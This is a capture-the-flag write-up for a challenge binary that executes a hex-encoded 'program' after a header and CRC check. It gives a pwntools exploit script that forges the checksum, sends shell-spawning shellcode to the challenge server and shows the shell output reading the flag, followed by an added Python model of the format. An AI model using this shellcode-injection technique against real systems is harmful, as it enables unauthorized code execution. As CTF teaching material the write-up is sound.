The binary accepts (via stdin) a hexadecimal representation of a user "program" to be executed. The program consists of the expected header, a CRC of the payload, and the payload itself. If the header check or the CRC check fails, the program won't be executed. The flag was located in the root directory (/flag.txt) on the remote server.


solve.py:

#!/usr/bin/env python2

import struct

try:
    from pwn import *
except ImportError:
    exit("[x] sudo pip install pwn")

context.arch = "x86_64"

header = "NIIv0.1:AmnlXing"
payload = asm(shellcraft.sh())

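# Recompute the checksum the binary checks: a bit-serial, CRC-style loop
# over the payload, most significant bit of each byte first.
v0 = 0
for char in payload:
    v7 = ord(char)
    for v9 in xrange(7, -1, -1):
        # The feedback constant is applied when the top bit of the state is set.
        if v0 >= 0x80000000:
            v10 = 0x80000011
        else:
            v10 = 0
        v12 = 2 * v0
        # Keep the upper 24 bits and XOR the current payload bit into the low byte.
        v12 = (v12 & 0xffffff00) | (((v7 >> v9) & 1 ^ v12) & 0xff)
        v0 = v10 ^ v12

# The checksum is sent as a 32-bit little-endian value.
crc = struct.pack("<L", v0)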

if True:
    r = remote("2020.redpwnc.tf", 31215)
else:
    r = process(["./nii"])

r.sendline((header + crc + payload).encode("hex").upper())
r.interactive()

Example output:

$ python solve.py 
[+] Opening connection to 2020.redpwnc.tf on port 31215: Done
[*] Switching to interactive mode
二〇二〇年,稳天堂软件公司——版权所有。
请插入游戏磁盘⋯⋯
$ ls
bin
dev
flag.txt
lib
lib32
lib64
nii
$ cat flag.txt
Its dangerous to go alone. Take this!
flag{shellcoding_is_a_rev_skill,_too!_8F13E8F6}

$
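
The container format described at the top and the checksum loop in solve.py, restated as a Python 3 packer and a model of the loader-side checks. This is an added example, not code from the original writeup or the challenge binary; the function names, the "truncated" check, the error strings and the sample payload are assumptions made for illustration.

```python
import struct

HEADER = b"NIIv0.1:AmnlXing"   # 16-byte header string used in solve.py
POLY = 0x80000011              # feedback constant from solve.py's loop


def nii_crc(data: bytes) -> int:
    """Bit-serial checksum from solve.py: zero start state, MSB first."""
    state = 0
    for byte in data:
        for bit in range(7, -1, -1):
            feedback = POLY if state & 0x80000000 else 0
            # Shift left within 32 bits and XOR the incoming bit into bit 0.
            shifted = ((state << 1) & 0xFFFFFFFF) ^ ((byte >> bit) & 1)
            state = feedback ^ shifted
    return state


def pack_program(payload: bytes) -> str:
    """header + little-endian CRC + payload, as one uppercase hex line."""
    blob = HEADER + struct.pack("<L", nii_crc(payload)) + payload
    return blob.hex().upper()


def check_program(hex_line: str) -> bytes:
    """Model of the two checks (header, CRC); returns the payload or raises."""
    blob = bytes.fromhex(hex_line.strip())
    if len(blob) < len(HEADER) + 4:
        raise ValueError("truncated")
    if blob[:len(HEADER)] != HEADER:
        raise ValueError("bad header")
    (stored,) = struct.unpack_from("<L", blob, len(HEADER))
    payload = blob[len(HEADER) + 4:]
    if stored != nii_crc(payload):
        raise ValueError("bad CRC")
    return payload


if __name__ == "__main__":
    sample = b"constructed sample payload"   # constructed input, not shellcode
    line = pack_program(sample)
    print(line)
    print(check_program(line) == sample)
```

Because the state starts at zero and nothing secret enters the loop, leading zero bytes leave the checksum unchanged and any sender can recompute it. The check catches corrupted input, not untrusted input.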